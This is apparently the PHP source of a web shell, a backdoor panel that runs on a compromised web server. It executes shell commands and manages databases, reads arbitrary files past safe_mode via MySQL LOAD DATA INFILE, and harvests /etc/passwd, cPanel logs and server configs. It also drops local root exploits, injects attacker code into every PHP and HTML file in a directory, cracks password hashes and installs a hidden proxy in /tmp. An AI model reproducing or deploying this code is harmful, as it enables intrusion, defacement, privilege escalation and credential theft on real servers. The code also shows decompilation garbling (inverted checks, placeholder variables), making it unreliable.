@ini_set( "highlight.html", $highlight_html ); @ini_set( "highlight.keyword", $highlight_keyword ); @ini_set( "highlight.string", $highlight_string ); if ( !is_array( $actbox ) ) { $actbox = array( ); } $dspact = $act = htmlspecialchars( $act ); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode( $d ); echo " "; echo "

"; echo $DISP_SERVER_SOFTWARE; echo "
Kernel: "; echo wordwrap( php_uname( ), 90, " ", 1 ); if ( $win ) { echo " (".exec( "ver" ).")"; } echo "	Safe-Mode: "; echo $hsafemode; echo "
"; if ( !$win ) { echo wordwrap( myshellexec( "id" ), 90, " ", 1 ); } else { echo "Running As: ".get_current_user( ); } echo "	Disabled PHP Functions: "; if ( "" == ( $df = ini_get( "disable_functions" ) ) ) { echo "NONE"; } else { echo " ".str_replace( ",", ", ", $df ).""; } echo ""; $curl_on = function_exists( "curl_version" ); echo " cURL: ".( $curl_on ? "ON" : "OFF" ); echo "
"; $d = str_replace( "\\", DIRECTORY_SEPARATOR, $d ); if ( isset( $d ) ) { $d = realpath( "." ); } else if ( realpath( $d ) ) { $d = realpath( $d ); } $d = str_replace( "\\", DIRECTORY_SEPARATOR, $d ); if ( substr( $d, 0 - 1 ) != DIRECTORY_SEPARATOR ) { $d .= DIRECTORY_SEPARATOR; } $d = str_replace( "\\\\", "\\", $d ); $dispd = htmlspecialchars( $d ); $pd = $e = explode( DIRECTORY_SEPARATOR, substr( $d, 0, 0 - 1 ) ); $i = 0; if ( is_callable( "disk_free_space" ) ) { $free = disk_free_space( $d ); $total = disk_total_space( $d ); if ( $free === FALSE ) { $free = 0; } if ( $total === FALSE ) { $total = 0; } if ( $free < 0 ) { $free = 0; } if ( $total < 0 ) { $total = 0; } $used = $total - $free; $free_percent = round( 100 / ( $total / $free ), 2 ); echo "Free ".view_size( $free )." of ".view_size( $total )." (".$free_percent."%)"; } echo "	Server IP: ".gethostbyname( $_SERVER['HTTP_HOST'] )." - Your IP: ".$_SERVER['REMOTE_ADDR']."

\r\n
\r\n

"; foreach ( $pd as $b ) { $t = ""; $j = 0; foreach ( $e as $r ) { $t .= $r.DIRECTORY_SEPARATOR; if ( $j == $i ) { break; } $j++; } echo "".htmlspecialchars( $b ).DIRECTORY_SEPARATOR.""; $i++; } echo "   "; if ( is_writable( $d ) ) { $wd = TRUE; $wdt = "[ ok ]"; echo "".view_perms( fileperms( $d ) ).""; } else { $wd = FALSE; $wdt = "[ Read-Only ]"; echo "".view_perms_color( $d ).""; } echo "
"; $letters = ""; if ( $win ) { $v = explode( "\\", $d ); $v = $v[0]; foreach ( range( "a", "z" ) as $letter ) { $bool = $isdiskette = in_array( $letter, $safemode_diskettes ); if ( !$bool ) { $bool = is_dir( $letter.":\\" ); } if ( $bool ) { $letters .= "["; if ( $letter.":" != $v ) { $letters .= strtoupper( $letter ); } else { $letters .= "".strtoupper( $letter ).""; } $letters .= ":] "; } } if ( !isset( $letters ) ) { echo "Detected drives: ".$letters."
"; } } if ( 0 < count( $quicklaunch ) ) { foreach ( $quicklaunch as $item ) { $item[1] = str_replace( "%d", urlencode( $d ), $item[1] ); $item[1] = str_replace( "%sort", $sort, $item[1] ); $v = realpath( $d.".." ); if ( isset( $v ) ) { $a = explode( DIRECTORY_SEPARATOR, $d ); $v = join( DIRECTORY_SEPARATOR, $a ); } $item[1] = str_replace( "%upd", urlencode( $v ), $item[1] ); echo "".$item[0]."    "; } } if ( 0 < count( $quicklaunch2 ) ) { echo "
"; foreach ( $quicklaunch2 as $item ) { $item[1] = str_replace( "%d", urlencode( $d ), $item[1] ); $item[1] = str_replace( "%sort", $sort, $item[1] ); $v = realpath( $d.".." ); if ( isset( $v ) ) { $a = explode( DIRECTORY_SEPARATOR, $d ); $v = join( DIRECTORY_SEPARATOR, $a ); } $item[1] = str_replace( "%upd", urlencode( $v ), $item[1] ); echo "".$item[0]."    "; } } if ( !isset( $donated_html ) && in_array( $act, $donated_act ) ) { echo "

".$donated_html."

"; } echo "

"; if ( $act == "" ) { $act = $dspact = "ls"; } if ( $act == "sql" ) { $sql_surl = $surl."act=sql"; if ( $sql_login ) { $sql_surl .= "&sql_login=".htmlspecialchars( $sql_login ); } if ( $sql_passwd ) { $sql_surl .= "&sql_passwd=".htmlspecialchars( $sql_passwd ); } if ( $sql_server ) { $sql_surl .= "&sql_server=".htmlspecialchars( $sql_server ); } if ( $sql_port ) { $sql_surl .= "&sql_port=".htmlspecialchars( $sql_port ); } if ( $sql_db ) { $sql_surl .= "&sql_db=".htmlspecialchars( $sql_db ); } $sql_surl .= "&"; echo "

"; if ( $sql_server ) { $sql_sock = mysql_connect( $sql_server.":".$sql_port, $sql_login, $sql_passwd ); $err = mysql_smarterror( ); @mysql_select_db( $sql_db, $sql_sock ); if ( $sql_query && $submit ) { $sql_query_result = mysql_query( $sql_query, $sql_sock ); $sql_query_error = mysql_smarterror( ); } } else { $sql_sock = FALSE; } echo "
MySQL: "; $mysql_on = function_exists( "mysql_connect" ); if ( $mysql_on ) { echo "ON"; } else { echo "OFF"; } echo "
MSSQL: "; $mssql_on = function_exists( "mssql_connect" ); if ( $mssql_on ) { echo "ON"; } else { echo "OFF"; } echo "
PostgreSQL: "; $pg_on = function_exists( "pg_connect" ); if ( $pg_on ) { echo "ON"; } else { echo "OFF"; } echo "
Oracle: "; $ora_on = function_exists( "ocilogon" ); if ( $ora_on ) { echo "ON"; } else { echo "OFF"; } echo "

"; echo "SQL Manager:
"; if ( !$sql_sock ) { if ( !$sql_server ) { echo "NO CONNECTION"; } else { echo "Can't connect"; echo "".$err.""; } } $sqlquicklaunch = array( ); $Var_1604[$sqlquicklaunch] = array( "Index", $surl."act=sql&sql_login=".htmlspecialchars( $sql_login )."&sql_passwd=".htmlspecialchars( $sql_passwd )."&sql_server=".htmlspecialchars( $sql_server )."&sql_port=".htmlspecialchars( $sql_port )."&" ); $Var_1626[$sqlquicklaunch] = array( "Query", $sql_surl."sql_act=query&sql_tbl=".urlencode( $sql_tbl ) ); $Var_1635[$sqlquicklaunch] = array( "Server-status", $surl."act=sql&sql_login=".htmlspecialchars( $sql_login )."&sql_passwd=".htmlspecialchars( $sql_passwd )."&sql_server=".htmlspecialchars( $sql_server )."&sql_port=".htmlspecialchars( $sql_port )."&sql_act=serverstatus" ); $Var_1657[$sqlquicklaunch] = array( "Server variables", $surl."act=sql&sql_login=".htmlspecialchars( $sql_login )."&sql_passwd=".htmlspecialchars( $sql_passwd )."&sql_server=".htmlspecialchars( $sql_server )."&sql_port=".htmlspecialchars( $sql_port )."&sql_act=servervars" ); $Var_1679[$sqlquicklaunch] = array( "Processes", $surl."act=sql&sql_login=".htmlspecialchars( $sql_login )."&sql_passwd=".htmlspecialchars( $sql_passwd )."&sql_server=".htmlspecialchars( $sql_server )."&sql_port=".htmlspecialchars( $sql_port )."&sql_act=processes" ); $Var_1701[$sqlquicklaunch] = array( "Logout", $surl."act=sql" ); echo "MySQL ".mysql_get_server_info( )." (proto v.".mysql_get_proto_info( ).") running in ".htmlspecialchars( $sql_server ).":".htmlspecialchars( $sql_port )." as ".htmlspecialchars( $sql_login )."@".htmlspecialchars( $sql_server )." (password - \"".htmlspecialchars( $sql_passwd )."\")
"; if ( 0 < count( $sqlquicklaunch ) ) { foreach ( $sqlquicklaunch as $item ) { echo "[ ".$item[0]." ] "; } } echo ""; echo "

If login is null, login is owner of process.

If host is null, host is localhost (default).

If port is null, port is 3306 (default).

Please, fill the form:

Username	Password	Database

Host	Port

Home

"; $result = mysql_list_tables( $sql_db ); if ( !$result ) { echo mysql_smarterror( ); } echo ".:[ ".htmlspecialchars( $sql_db )." ]:.
"; $c = 0; while ( $row = mysql_fetch_array( $result ) ) { $count = mysql_query( "SELECT COUNT(*) FROM ".$row[0] ); $count_row = mysql_fetch_array( $count ); echo "+ ".htmlspecialchars( $row[0] )." (".$count_row[0].")
"; mysql_free_result( $count ); $c++; } if ( !$c ) { echo "No tables found in database."; } } else { echo "

Home

"; $result = mysql_list_dbs( $sql_sock ); if ( !$result ) { echo mysql_smarterror( ); } echo " "; } echo "

"; $diplay = TRUE; if ( $sql_db ) { if ( !is_numeric( $c ) ) { $c = 0; } if ( $c == 0 ) { $c = "no"; } echo "

There are ".$c." table(s) in this DB (".htmlspecialchars( $sql_db ).").
"; if ( 0 < count( $dbquicklaunch ) ) { foreach ( $dbsqlquicklaunch as $item ) { echo "[ ".$item[0]." ] "; } } echo ""; $acts = array( "", "dump" ); if ( $sql_act == "tbldrop" ) { $sql_query = "DROP TABLE"; foreach ( $boxtbl as $v ) { $sql_query .= "\n`".$v."` ,"; } $sql_query = substr( $sql_query, 0, 0 - 1 ).";"; $sql_act = "query"; } else if ( $sql_act == "tblempty" ) { $sql_query = ""; foreach ( $boxtbl as $v ) { $sql_query .= "DELETE FROM `".$v."` \n"; } $sql_act = "query"; } else if ( $sql_act == "tbldump" ) { if ( 0 < count( $boxtbl ) ) { $dmptbls = $boxtbl; } else if ( $thistbl ) { $dmptbls = array( ); } $sql_act = "dump"; } else if ( $sql_act == "tblcheck" ) { $sql_query = "CHECK TABLE"; foreach ( $boxtbl as $v ) { $sql_query .= "\n`".$v."` ,"; } $sql_query = substr( $sql_query, 0, 0 - 1 ).";"; $sql_act = "query"; } else if ( $sql_act == "tbloptimize" ) { $sql_query = "OPTIMIZE TABLE"; foreach ( $boxtbl as $v ) { $sql_query .= "\n`".$v."` ,"; } $sql_query = substr( $sql_query, 0, 0 - 1 ).";"; $sql_act = "query"; } else if ( $sql_act == "tblrepair" ) { $sql_query = "REPAIR TABLE"; foreach ( $boxtbl as $v ) { $sql_query .= "\n`".$v."` ,"; } $sql_query = substr( $sql_query, 0, 0 - 1 ).";"; $sql_act = "query"; } else if ( $sql_act == "tblanalyze" ) { $sql_query = "ANALYZE TABLE"; foreach ( $boxtbl as $v ) { $sql_query .= "\n`".$v."` ,"; } $sql_query = substr( $sql_query, 0, 0 - 1 ).";"; $sql_act = "query"; } else if ( $sql_act == "deleterow" ) { $sql_query = ""; if ( !isset( $boxrow_all ) ) { $sql_query = "DELETE * FROM `".$sql_tbl."`;"; } else { foreach ( $boxrow as $v ) { $sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n"; } $sql_query = substr( $sql_query, 0, 0 - 1 ); } $sql_act = "query"; } else if ( $sql_tbl_act == "insert" ) { if ( $sql_tbl_insert_radio == 1 ) { $keys = ""; $akeys = array_keys( $sql_tbl_insert ); foreach ( $akeys as $v ) { $keys .= "`".addslashes( $v )."`, "; } if ( !isset( $keys ) ) { $keys = substr( $keys, 0, strlen( $keys ) - 2 ); } $values = ""; $i = 0; foreach ( array_values( $sql_tbl_insert ) as $v ) { if ( $funct = $sql_tbl_insert_functs[$akeys[$i]] ) { $values .= $funct." ("; } $values .= "'".addslashes( $v )."'"; if ( $funct ) { $values .= ")"; } $values .= ", "; $i++; } if ( !isset( $values ) ) { $values = substr( $values, 0, strlen( $values ) - 2 ); } $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; $sql_act = "query"; $sql_tbl_act = "browse"; } else if ( $sql_tbl_insert_radio == 2 ) { $set = mysql_buildwhere( $sql_tbl_insert, ", ", $sql_tbl_insert_functs ); $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; ( $result = mysql_query( $sql_query ) ) || print mysql_smarterror( ); $result = mysql_fetch_array( $result, MYSQL_ASSOC ); $sql_act = "query"; $sql_tbl_act = "browse"; } } if ( $sql_act == "query" ) { echo "

"; if ( $submit && !$sql_query_result && $sql_confirm ) { if ( !$sql_query_error ) { $sql_query_error = "Query was empty"; } echo "Error:
".$sql_query_error."
"; } if ( $sql_query_result || !$sql_confirm ) { $sql_act = $sql_goto; } if ( !$submit || $sql_act ) { echo "

"; } } if ( in_array( $sql_act, $acts ) ) { echo "

Create new table:	Dump DB:

"; if ( !isset( $sql_act ) ) { echo "

"; } if ( $sql_act == "newtbl" ) { echo ""; if ( mysql_create_db( $sql_newdb ) && !isset( $sql_newdb ) ) { echo "DB \"".htmlspecialchars( $sql_newdb )."\" has been created with success!
"; } else { echo "Can't create DB \"".htmlspecialchars( $sql_newdb )."\".
Reason: ".mysql_smarterror( ); } } else if ( $sql_act == "dump" ) { if ( isset( $submit ) ) { $diplay = FALSE; echo "

SQL-Dump:

"; echo "DB:

"; $v = join( ";", $dmptbls ); echo "Only tables (explode \";\") ¹:

"; if ( $dump_file ) { $tmp = $dump_file; } else { $tmp = htmlspecialchars( "./dump_".getenv( "SERVER_NAME" )."_".$sql_db."_".date( "d-m-Y-H-i-s" ).".sql" ); } echo "File:

"; echo "Download:

"; echo "Save to file: "; echo "

¹ - all, if empty"; echo "

"; } $diplay = TRUE; $set = array( ); $set['sock'] = $sql_sock; $set['db'] = $sql_db; $dump_out = "download"; $set['print'] = 0; $set['nl2br'] = 0; $set[''] = 0; $set['file'] = $dump_file; $set['add_drop'] = TRUE; $set['onlytabs'] = array( ); if ( !isset( $dmptbls ) ) { $set['onlytabs'] = explode( ";", $dmptbls ); } $ret = mysql_dump( $set ); if ( $sql_dump_download ) { @ob_clean( ); header( "Content-type: application/octet-stream" ); header( "Content-length: ".strlen( $ret ) ); header( "Content-disposition: attachment; filename=\"".basename( $sql_dump_file )."\";" ); echo $ret; exit( ); } else if ( $sql_dump_savetofile ) { $fp = fopen( $sql_dump_file, "w" ); if ( !$fp ) { echo "Dump error! Can't write to \"".htmlspecialchars( $sql_dump_file )."\"!"; } else { fwrite( $fp, $ret ); fclose( $fp ); echo "Dumped! Dump has been writen to \"".htmlspecialchars( realpath( $sql_dump_file ) )."\" (".view_size( filesize( $sql_dump_file ) ).")."; } } else { echo "Dump: nothing to do!"; } } if ( $diplay ) { if ( !isset( $sql_tbl ) ) { if ( isset( $sql_tbl_act ) ) { $sql_tbl_act = "browse"; } $count = mysql_query( "SELECT COUNT(*) FROM `".$sql_tbl."`;" ); $count_row = mysql_fetch_array( $count ); mysql_free_result( $count ); $tbl_struct_result = mysql_query( "SHOW FIELDS FROM `".$sql_tbl."`;" ); $tbl_struct_fields = array( ); while ( $row = mysql_fetch_assoc( $tbl_struct_result ) ) { $Var_2510[$tbl_struct_fields] = $row; } if ( $sql_le < $sql_ls ) { $sql_le = $sql_ls + $perpage; } if ( isset( $sql_tbl_page ) ) { $sql_tbl_page = 0; } if ( isset( $sql_tbl_ls ) ) { $sql_tbl_ls = 0; } if ( isset( $sql_tbl_le ) ) { $sql_tbl_le = 30; } $perpage = $sql_tbl_le - $sql_tbl_ls; if ( !is_numeric( $perpage ) ) { $perpage = 10; } $numpages = $count_row[0] / $perpage; $e = explode( " ", $sql_order ); if ( count( $e ) == 2 ) { if ( $e[0] == "d" ) { $asc_desc = "DESC"; } else { $asc_desc = "ASC"; } $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else { $v = ""; } $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; ( $result = mysql_query( $query ) ) || print mysql_smarterror( ); echo "
Table ".htmlspecialchars( $sql_tbl )." (".mysql_num_fields( $result )." cols and ".$count_row[0]." rows)"; echo "[ Structure ]   "; echo "[ Browse ]   "; echo "[ Dump ]   "; echo "[ Insert ]   "; if ( $sql_tbl_act == "structure" ) { echo "

Coming sooon!"; } if ( $sql_tbl_act == "insert" ) { if ( !is_array( $sql_tbl_insert ) ) { $sql_tbl_insert = array( ); } if ( !isset( $sql_tbl_insert_radio ) ) { echo "

Inserting row into table:
"; } else if ( !isset( $sql_tbl_insert_q ) ) { $sql_query = "SELECT * FROM `".$sql_tbl."`"; $sql_query .= " WHERE".$sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; ( $result = mysql_query( $sql_query, $sql_sock ) ) || print "

".mysql_smarterror( ); $values = mysql_fetch_assoc( $result ); mysql_free_result( $result ); } else { $values = array( ); } echo "

Field Type Function Value

".htmlspecialchars( $name )." ".$field['Type']."

"; echo "Save"; echo ""; } echo "

"; } if ( $sql_tbl_act == "browse" ) { $sql_tbl_ls = abs( $sql_tbl_ls ); $sql_tbl_le = abs( $sql_tbl_le ); echo "
"; echo "[Pages] "; $b = 0; $i = 0; for ( ; $i < $numpages; $i++ ) { if ( $i * $perpage != $sql_tbl_ls || $i * $perpage + $perpage != $sql_tbl_le ) { echo ""; } echo $i; if ( $i * $perpage != $sql_tbl_ls || $i * $perpage + $perpage != $sql_tbl_le ) { echo ""; } if ( $i / 30 == round( $i / 30 ) && 0 < $i ) { echo "
"; } else { echo " "; } } if ( $i == 0 ) { echo "empty"; } echo "
From:  To:
"; echo "

"; if ( isset( $e[0] ) ) { $e[0] = "a"; } if ( $e[1] != $v ) { echo "".$v.""; } else { echo "".$v."[sort]"; } echo " Action

".$v." "; echo "[Delete] "; echo "[Edit] "; echo "

"; } } $result = mysql_query( "SHOW TABLE STATUS", $sql_sock ); if ( !$result ) { echo mysql_smarterror( ); } echo "

Table Rows Type Created Modified Size Action

".$row['Name']." ".$row['Rows']." ".$row['Type']." ".$row['Create_time']." ".$row['Update_time']." ".$size." [Empty]  [Drop] [Insert]

+ ".$i." table(s) ".$trows." ".$row[1]." ".$row[10]." ".$row[11]." ".view_size( $tsize )."

"; mysql_free_result( $result ); } } } $acts = array( "", "newdb", "serverstatus", "servervars", "processes", "getfile" ); if ( in_array( $sql_act, $acts ) ) { echo "

Create new Database:

View File:

"; } if ( !isset( $sql_act ) ) { echo "
"; if ( $sql_act == "newdb" ) { echo ""; if ( mysql_create_db( $sql_newdb ) && !isset( $sql_newdb ) ) { echo "DB \"".htmlspecialchars( $sql_newdb )."\" has been created with success!
"; } else { echo "Can't create DB \"".htmlspecialchars( $sql_newdb )."\".
Reason: ".mysql_smarterror( ); } } if ( $sql_act == "serverstatus" ) { $result = mysql_query( "SHOW STATUS", $sql_sock ); echo "Server-status variables:

"; echo "

Name	Value
".$row[0]."	".$row[1]."

"; mysql_free_result( $result ); } if ( $sql_act == "servervars" ) { $result = mysql_query( "SHOW VARIABLES", $sql_sock ); echo "Server variables:

"; echo "

Name	Value
".$row[0]."	".$row[1]."

"; mysql_free_result( $result ); } if ( $sql_act == "processes" ) { if ( !isset( $kill ) ) { $query = "KILL ".$kill.";"; $result = mysql_query( $query, $sql_sock ); echo "Killing process #".$kill."... ok. he is dead, amen."; } $result = mysql_query( "SHOW PROCESSLIST", $sql_sock ); echo "Processes:

"; echo "

ID	USER	HOST	DB	COMMAND	TIME	STATE	INFO	Action
".$row[0]."	".$row[1]."	".$row[2]."	".$row[3]."	".$row[4]."	".$row[5]."	".$row[6]."	".$row[7]."	Kill

"; mysql_free_result( $result ); } if ( $sql_act == "getfile" ) { $tmpdb = $sql_login."_tmpdb"; $select = mysql_select_db( $tmpdb ); if ( !$select ) { mysql_create_db( $tmpdb ); $select = mysql_select_db( $tmpdb ); $created = !( !$select ); } if ( $select ) { $created = FALSE; mysql_query( "CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );" ); mysql_query( "LOAD DATA INFILE \"".addslashes( $sql_getfile )."\" INTO TABLE tmp_file" ); $result = mysql_query( "SELECT * FROM tmp_file;" ); if ( !$result ) { echo "Error in reading file (permision denied)!"; } $i = 0; for ( ; $i < mysql_num_fields( $result ); $i++ ) { $name = mysql_field_name( $result, $i ); } $f = ""; while ( $row = mysql_fetch_array( $result, MYSQL_ASSOC ) ) { $f .= join( "\r\n", $row ); } if ( isset( $f ) ) { echo "File \"".$sql_getfile."\" does not exists or empty!
"; } else { echo "File \"".$sql_getfile."\":
".nl2br( htmlspecialchars( $f ) )."
"; } mysql_free_result( $result ); mysql_query( "DROP TABLE tmp_file;" ); } mysql_drop_db( $tmpdb ); } } echo "

"; if ( $sql_sock ) { $affected = mysql_affected_rows( $sql_sock ); if ( !is_numeric( $affected ) || $affected < 0 ) { $affected = 0; } echo "

Affected rows: ".$affected."

"; } if ( $act == "mkdir" ) { if ( $mkdir != $d ) { if ( file_exists( $mkdir ) ) { echo "Make Dir \"".htmlspecialchars( $mkdir )."\": object alredy exists"; } else if ( !mkdir( $mkdir ) ) { echo "Make Dir \"".htmlspecialchars( $mkdir )."\": access denied"; } echo "

"; } $act = $dspact = "ls"; } if ( $act == "d" ) { if ( !is_dir( $d ) ) { echo "Permision denied!"; echo "Directory information:

Owner/Group	"; $ow = posix_getpwuid( fileowner( $d ) ); $gr = posix_getgrgid( filegroup( $d ) ); $Var_3438[$row] = ( $ow['name'] ? $ow['name'] : fileowner( $d ) )."/".( $gr['name'] ? $gr['name'] : filegroup( $d ) ); } else { echo "
Perms	".view_perms_color( $d )."
Create time	".date( "d/m/Y H:i:s", filectime( $d ) )."
Access time	".date( "d/m/Y H:i:s", fileatime( $d ) )."
MODIFY time	".date( "d/m/Y H:i:s", filemtime( $d ) )."

"; } } if ( $act == "phpinfoframe" ) { @ob_clean( ); phpinfo( ); gnyexit( ); } if ( $act == "phpinfo" ) { echo ""; } if ( $act == "exploit" ) { echo "

\r\n"; } if ( $act == "exploits" ) { echo "Exploits:\r\n

\r\nAll exploits are pre-compiled. Just follow the directions.\r\n

\r\nh00lyshit - Local Race Exploit
\r\n \r\n"; if ( $_GET['sploit'] == "h00lyshit" ) { if ( is_writable( $_GET['path'] ) ) { cf( $_GET['path']."h00lyshit", $h00lyshit ); echo "h00lyshit was created in ".htmlentities( $_GET['path'] ).""; chmod( $_GET['path']."/h00lyshit", 511 ); } else { echo "Directory is not writable!
"; } } echo "

\r\nraptor_chown - Group Modification Exploit
\r\n \r\n"; if ( $_GET['sploit'] == "raptorchown" ) { if ( is_writable( $_GET['path'] ) ) { cf( $_GET['path']."raptor_chown", $raptorchown ); echo "raptor_chown was created in ".htmlentities( $_GET['path'] ).""; chmod( $_GET['path']."/raptor_chown", 511 ); } else { echo "Directory is not writable!
"; } } } if ( $act == "massbrowsersploit" ) { echo "Mass Code Injection:

\r\nUse this to add HTML to the end of every .php, .htm, and .html page in the directory specified.

\r\n \r\n"; if ( $_GET['masssploit'] == "goahead" ) { if ( is_dir( $_GET['pathtomass'] ) ) { $lolinject = $_GET['injectthis']; foreach ( glob( $_GET['pathtomass']."/*.php" ) as $injectj00 ) { $fp = fopen( $injectj00, "a+" ); if ( fputs( $fp, $lolinject ) ) { echo "".$injectj00." was injected
"; } else { echo "failed to inject ".$injectj00.""; } } foreach ( glob( $_GET['pathtomass']."/*.htm" ) as $injectj00 ) { $fp = fopen( $injectj00, "a+" ); if ( fputs( $fp, $lolinject ) ) { echo $injectj00." was injected
"; } else { echo "failed to inject ".$injectj00.""; } } foreach ( glob( $_GET['pathtomass']."/*.html" ) as $injectj00 ) { $fp = fopen( $injectj00, "a+" ); if ( fputs( $fp, $lolinject ) ) { echo $injectj00." was injected
"; } else { echo "failed to inject ".$injectj00.""; } } } else { echo "".$_GET['pathtomass']." is not available!"; } } echo "Mass Code Injection:

\r\nUse this to add PHP to the end of every .php page in the directory specified.

\r\n \r\n"; if ( $_GET['masssploit'] == "php" ) { if ( is_dir( $_GET['pathtomass'] ) ) { $lolinject = $_GET['injectthis']; foreach ( glob( $_GET['pathtomass']."/*.php" ) as $injectj00 ) { $fp = fopen( $injectj00, "a+" ); if ( fputs( $fp, $lolinject ) ) { echo "".$injectj00." was injected
"; } else { echo "failed to inject ".$injectj00.""; } } } else { echo "".$_GET['pathtomass']." is not available!"; } } } if ( $act == "security" ) { echo "Server security information:Open base dir: ".$hopenbasedir."
"; if ( !$win ) { if ( $nixpasswd ) { if ( $nixpasswd == 1 ) { $nixpasswd = 0; } echo "*nix /etc/passwd:
"; if ( !is_numeric( $nixpwd_s ) ) { $nixpwd_s = 0; } if ( !is_numeric( $nixpwd_e ) ) { $nixpwd_e = $nixpwdperpage; } echo "
"; $i = $nixpwd_s; while ( $i < $nixpwd_e ) { $uid = posix_getpwuid( $i ); if ( $uid ) { $uid['dir'] = "".$uid['dir'].""; echo join( ":", $uid )."
"; } $i++; } } else { echo "
Get /etc/passwd
"; } if ( file_get_contents( "/etc/userdomains" ) ) { echo "View cpanel user-domains logs
"; } if ( file_get_contents( "/var/cpanel/accounting.log" ) ) { echo "View cpanel logs
"; } if ( file_get_contents( "/usr/local/apache/conf/httpd.conf" ) ) { echo "Apache configuration (httpd.conf)
"; } if ( file_get_contents( "/etc/httpd.conf" ) ) { echo "Apache configuration (httpd.conf)
"; } if ( file_get_contents( "/etc/syslog.conf" ) ) { echo "Syslog configuration (syslog.conf)
"; } if ( file_get_contents( "/etc/motd" ) ) { echo "Message Of The Day
"; } if ( file_get_contents( "/etc/hosts" ) ) { echo "Hosts
"; } displaysecinfo( "OS Version?", myshellexec( "cat /proc/version" ) ); displaysecinfo( "Kernel version?", myshellexec( "sysctl -a | grep version" ) ); displaysecinfo( "Distrib name", myshellexec( "cat /etc/issue.net" ) ); displaysecinfo( "Distrib name (2)", myshellexec( "cat /etc/*-realise" ) ); displaysecinfo( "CPU?", myshellexec( "cat /proc/cpuinfo" ) ); displaysecinfo( "RAM", myshellexec( "free -m" ) ); displaysecinfo( "HDD space", myshellexec( "df -h" ) ); displaysecinfo( "List of Attributes", myshellexec( "lsattr -a" ) ); displaysecinfo( "Mount options ", myshellexec( "cat /etc/fstab" ) ); displaysecinfo( "Is cURL installed?", myshellexec( "which curl" ) ); displaysecinfo( "Is lynx installed?", myshellexec( "which lynx" ) ); displaysecinfo( "Is links installed?", myshellexec( "which links" ) ); displaysecinfo( "Is fetch installed?", myshellexec( "which fetch" ) ); displaysecinfo( "Is GET installed?", myshellexec( "which GET" ) ); displaysecinfo( "Is perl installed?", myshellexec( "which perl" ) ); displaysecinfo( "Where is apache", myshellexec( "whereis apache" ) ); displaysecinfo( "Where is perl?", myshellexec( "whereis perl" ) ); displaysecinfo( "locate proftpd.conf", myshellexec( "locate proftpd.conf" ) ); displaysecinfo( "locate httpd.conf", myshellexec( "locate httpd.conf" ) ); displaysecinfo( "locate my.conf", myshellexec( "locate my.conf" ) ); displaysecinfo( "locate psybnc.conf", myshellexec( "locate psybnc.conf" ) ); } exec( "systeminfo", &$wininfo ); echo "
DOS command: systeminfo
\r\n\r\n"; } if ( $act == "mkfile" ) { if ( $mkfile != $d ) { if ( file_exists( $mkfile ) ) { echo "Make File \"".htmlspecialchars( $mkfile )."\": object alredy exists"; } else if ( !fopen( $mkfile, "w" ) ) { echo "Make File \"".htmlspecialchars( $mkfile )."\": access denied"; } $act = "f"; $d = dirname( $mkfile ); if ( substr( $d, 0 - 1 ) != DIRECTORY_SEPARATOR ) { $d .= DIRECTORY_SEPARATOR; } $f = basename( $mkfile ); } else { $act = $dspact = "ls"; } } if ( $act == "encoder" ) { echo "Encoder:

Input:

Hashes:
"; foreach ( array( "md5", "crypt", "sha1", "crc32" ) as $v ) { echo $v." -
"; } echo "Url:
urlencode - \r\n
urldecode - \r\n
Base64:base64_encode - "; echo "base64_decode - "; if ( base64_encode( base64_decode( $encoder_input ) ) != $encoder_input ) { echo ""; } $debase64 = base64_decode( $encoder_input ); $debase64 = str_replace( "%00", "[0]", $debase64 ); $a = explode( "\r\n", $debase64 ); $rows = count( $a ); $debase64 = htmlspecialchars( $debase64 ); if ( $rows == 1 ) { echo ""; } else { $rows++; echo "

".$debase64."

"; } echo " ^"; echo "
Base convertations:dec2hex -
\r\n

\r\n

\r\nSearch milw0rm for MD5 hash\r\n	\r\nSearch md5encryption.com for MD5 or SHA1 hash\r\n	\r\nSearch CsTeam for MD5 hash\r\n	\r\nSearch GData for MD5 hash\r\n
\r\n\r\n \r\n \r\n	\r\n\r\n \r\n \r\n\r\n	\r\n\r\n \r\n"; echo " \r\n\r\n	\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n

\r\n
\r\n\r\nWordlist Hash Crac"; echo "ker

\r\n \r\n\r\n"; if ( isset( $_GET['hash'] ) && isset( $_GET['wordlist'] ) && ( $_GET['type'] == "md5" || $_GET['type'] == "sha1" ) ) { $type = $_GET['type']; $hash = $_GET['hash']; $count = 1; $wordlist = file( $_GET['wordlist'] ); $words = count( $wordlist ); foreach ( $wordlist as $word ) { echo $count." of ".$words.": ".$word."
"; if ( $hash == ( rtrim( $word ) ) ) { echo "Great success! The password is: ".$word."
"; break; } ++$count; } } } if ( $act == "fsbuff" ) { $arr_copy = $sess_data['copy']; $arr_cut = $sess_data['cut']; $arr = array_merge( $arr_copy, $arr_cut ); if ( count( $arr ) == 0 ) { echo "Buffer is empty!"; } else { echo "File-System buffer

"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls"; } } if ( $act == "proxy" ) { if ( $_GET['ipisk'] == "yup" ) { cf( "/tmp/hantu.tgz", $proxy_shit ); ex( "cd /tmp;tar -zxvf hantu.tgz" ); ex( "cd /tmp;cd .setan;chmod 777 xh" ); ex( "cd /tmp;cd .setan;chmod 777 httpd" ); ex( "cd /tmp;cd .setan;./xh -s [kmod] ./httpd start" ); checkproxyhost( ); $msg = $_POST['proxyhostmsg']; echo "$msg"; unlink( "/tmp/hantu.tgz" ); ex( "cd /tmp; rm -r .setan" ); } else { echo "Are you sure you want to install an IP:Port proxy on this website/server?
Please note, some servers with firewalls or other security features may not be compatible with this, even if the proxy appears to be installed.

Yes || No"; } } if ( $act == "fi" ) { echo "Install Local RFI/LFI Scanner
\r\n \r\n"; if ( $_GET['install'] == "yup" ) { if ( is_writable( $_GET['path'] ) ) { cf( $_GET['path']."fi.pl", $fi ); echo "fi.pl was created in ".htmlentities( $_GET['path'] ).""; chmod( $_GET['path']."/fi.pl", 511 ); echo "
To execute, browse to the directory you installed the scanner in and execute it from there using 'perl fi.pl'"; } else { echo "Directory is not writable!
